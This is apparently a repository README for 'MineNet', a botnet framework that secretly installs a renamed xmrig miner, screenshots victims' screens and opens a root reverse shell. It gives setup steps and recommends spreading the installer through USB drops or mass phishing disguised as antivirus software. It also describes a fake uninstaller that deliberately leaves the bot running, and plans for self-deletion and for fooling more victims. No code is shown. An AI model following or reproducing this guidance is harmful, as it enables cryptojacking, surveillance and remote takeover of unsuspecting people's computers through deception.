Skip to content
Switch branches/tags

Latest commit


Git stats


Failed to load latest commit information.
Latest commit message
Commit time


User Documentation

What is MineNet?

Mine net is a bot net framework, designed to mine crypto currency and to provide spyware functionality for the attacker.

Key Features

  • See what bots have connected since launching the controller
  • Screenshot your victims screens and send it back to the controller
  • Gain a back door by getting a root user reverse shell
  • SSL encryption
  • Multiple connections at one time

How do I set MineNet up?

  1. Install Repo: git clone
  2. Download Requried Modules: python3 -m pip install simple-term-menu pysimplegui
  3. Edit Controller/, and Bot/ to place your own ip and port addresses.
  4. Put your Monero wallet address into
  5. Install your own SSL certifates and keys into Controller/Misc. Here is a guide
  6. Run controller (use -t for terminal interface): python3 -g
  7. Deploy payload on victims PC. (USB attack recommended however phishing attacks also work.)
  8. Enjoy full access to their machine. To view the pool head to and search for your wallet.

Attack Examples

Example 1: Use python package installer, to make the installer executable (this means the victim doesn't need python). Then send out mass phishing emails telling people to install this antivirus software for full irony.

Example 2: Upload the installer onto a usb stick and install manually onto a target's pc. The install takes less than a minute to simulate a loading bar but this could be made even faster by just removing that section.

Developer Documention

File Breakdown


  • This is the bot script. The file gets added to the victims start-up folder, which gives this file root privleges. MineNet/Controller
  • This file is the main file you need to run. From this file you can select which type of interface you want to access. The gui is ran from here using one of two mulitprocesses. The second process is to access the server functionality.
  • This gets loaded when the user wants a terminal menu interface. This file runs very similary to the gui with the same two multiprocesses.
  • The backbone of the controller. This provides shared functions for the gui and terminal displays. Two main functions you find on here is the listener, this function acts as a server socket listening to requests to the sever. The Second is the sender that acts like a client, this is used to connect directly to the bots. The other functions you'll find in this file are subroutines for useful functions such as saving files. These can be used to be built on.
  • /Images: This folder stores screenshots taken by the bot.
  • /Misc: You need to put you SSL certificates into this file. This file also stores Active.txt, the file that appends the IPs of bots that are currently active since the last controller boot. MineNet/Installer
  • This file is the program that takes the bot from the server and uploads it to the start-up folder with all the service file.
  • InstallerData: This is the miner, it is xmrig but renamed to make sure the victim can't tell what the file actually is.
  • This is the uninstaller that the victim gets told to use. This file only removes the Installer folder, not the bot. This is to lower the suspicion of the victim.
  • /services: This folder contains all the service scripts and the configuration file that sets up the bot into the right place.

What the service needs next

Currently the framework only works for linux, it would be better if the attack can work on Windows and Mac. More utilities would be useful too. Maybe a self destruct option to make sure a bot deletes itself to remove any trace. To fool more victims the UI of the installer will need to get an update. Currently I am using PySimpleGui module to make the gui and the top section of the script is the set up.


Framework to a crypto mining botnet with some extra utilities.



No releases published